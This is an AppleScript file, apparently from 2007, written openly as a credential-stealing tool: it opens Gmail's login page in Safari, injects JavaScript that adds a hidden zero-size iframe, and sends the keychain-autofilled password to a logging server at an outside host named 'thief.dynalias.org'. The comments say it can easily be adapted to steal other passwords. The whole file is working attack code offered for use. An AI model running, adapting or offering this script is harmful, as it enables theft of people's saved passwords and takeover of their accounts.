-- This script can be used to steal gmail's keychained password by injecting 
-- Javascripts into Safari. When executed it opens gmail's login page, reads
-- saved password and sends it to a logging server by creating an hidden iframe
-- into gmail's page. It can be easly modified to steal other pass. 

-- poplix papuasia.org -- http://px.dynalias.org -- 09-22-2007





--Your logging server
set LOGGING_URL to "http://thief.dynalias.org/log.php?p="

--Creates an hidden iframe into google's login DIV
set HIDDENFRAME to "document.getElementById('login').innerHTML+='<iframe id=steal width=0 height=0></iframe>'" 

--Stealing code
set JSTEAL to "document.getElementById('steal').src='" & LOGGING_URL & "'+document.getElementById('gaia_loginform').Passwd.value"




--Open gmail login page 
tell application "Safari"
open location "https://www.google.com/accounts/ServiceLogin?service=mail"
end tell

--Wait loading...
delay 10


--Create an hidden iframe to load LOGGING_URL
tell application "Safari"
do JavaScript HIDDENFRAME in document 1
end tell

delay 1

--Send password to LOGGING_URL
tell application "Safari"
do JavaScript JSTEAL in document 1
end tell